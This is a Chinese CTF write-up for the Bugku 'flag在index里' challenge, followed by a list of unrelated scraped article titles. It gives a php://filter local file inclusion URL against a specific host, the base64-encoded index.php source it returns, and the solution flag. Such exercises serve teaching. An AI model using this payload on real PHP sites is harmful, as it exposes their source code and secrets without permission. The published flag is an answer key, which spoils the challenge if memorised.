bugku flag在index里
来源:互联网 发布:pmi指数知乎 编辑:程序博客网 时间:2024/05/21 14:07
首先进去界面是一个这样的界面
我们点击后发现网址变成了http://120.24.86.145:8005/post/index.php?file=show.php
这里我们看到了file关键字
于是我们就想到了php://filter
如果不懂的话这里给大家一篇博客
点击打开链接
所以我们把网址改为
http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
便能得到一串base64加密后的字符串
PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==
然后我们进行解密
就拿到了flag
flag{edulcni_elif_lacol_si_siht}
- bugku flag在index里
- CTF/CTF练习平台-flag在index里【php://filter的利用】
- bugku 输入密码查看flag
- 在pl/sql 里实现index 索引 效果
- 求助: 用list配置双向一对多的关系, list-index 在数据库里是Null
- thinkphp的目录常量在入口文件index.php里定义
- FLag
- Flag
- flag
- flag
- flag
- FLAG
- Flag
- Flag
- FLAG
- Flag
- flag
- Flag
- zip总结
- js监听手机端的touch滑动事件
- python学习系列---str和int类型内置方法
- Material Design 系列之 Toolbar
- 数据太大,记事本打不开怎么办?
- bugku flag在index里
- JVM结构、GC工作机制详解
- Label1
- python筛选中日韩文
- Android 打开本地文件
- 多线程理解杂记
- Android TextView加载Html图文混排
- nexus配置maven私服
- LabelAtlas